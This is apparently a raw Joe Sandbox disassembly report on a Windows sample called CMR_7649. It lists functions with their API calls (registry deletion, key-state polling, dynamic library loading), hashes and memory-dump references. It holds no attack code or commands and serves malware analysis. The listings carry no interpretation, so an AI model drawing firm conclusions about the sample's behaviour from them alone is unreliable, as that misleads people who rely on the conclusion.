                                                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                • _wcslen.LIBCMT ref: 0045F94A
                                                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                • String ID: 0
                                                • API String ID: 621800784-4108050209
                                                • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SetErrorMode.KERNEL32 ref: 004781CE
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • SetErrorMode.KERNEL32(?), ref: 00478270
                                                • SetErrorMode.KERNEL32(?), ref: 00478340
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                • String ID: \VH
                                                • API String ID: 3884216118-234962358
                                                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                • IsMenu.USER32(?), ref: 0044854D
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                • DrawMenuBar.USER32 ref: 004485AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$Item$DrawInfoInsert
                                                • String ID: 0
                                                • API String ID: 3076010158-4108050209
                                                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$_memmove_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 1589278365-1403004172
                                                • Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                • Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
                                                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Handle
                                                • String ID: nul
                                                • API String ID: 2519475695-2873401336
                                                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Handle
                                                • String ID: nul
                                                • API String ID: 2519475695-2873401336
                                                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: SysAnimate32
                                                • API String ID: 0-1011021900
                                                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                • GetFocus.USER32 ref: 0046157B
                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                • __swprintf.LIBCMT ref: 00461608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                • String ID: %s%d
                                                • API String ID: 2645982514-1110647743
                                                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                APIs
                                                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                • String ID:
                                                • API String ID: 3488606520-0
                                                • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ConnectRegistry_memmove_wcslen
                                                • String ID:
                                                • API String ID: 15295421-0
                                                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                APIs
                                                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AddressProc$Library$FreeLoad
                                                • String ID:
                                                • API String ID: 2449869053-0
                                                • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004563A6
                                                • ScreenToClient.USER32(?,?), ref: 004563C3
                                                • GetAsyncKeyState.USER32(?), ref: 00456400
                                                • GetAsyncKeyState.USER32(?), ref: 00456410
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                • String ID:
                                                • API String ID: 3539004672-0
                                                • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                APIs
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                • String ID:
                                                • API String ID: 327565842-0
                                                • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String
                                                • String ID:
                                                • API String ID: 2832842796-0
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                Similarity
                                                • API ID: Enum$CloseDeleteOpen
                                                • String ID:
                                                • API String ID: 2095303065-0
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00436A24
                                                Similarity
                                                • API ID: RectWindow
                                                • String ID:
                                                • API String ID: 861336768-0
                                                APIs
                                                • SendMessageW.USER32 ref: 00449598
                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                • _wcslen.LIBCMT ref: 0044960D
                                                • _wcslen.LIBCMT ref: 0044961A
                                                • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                Similarity
                                                • API ID: MessageSend$_wcslen$_wcspbrk
                                                • String ID:
                                                • API String ID: 1856069659-0
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004478E2
                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                • GetCursorPos.USER32(00000000), ref: 0044796A
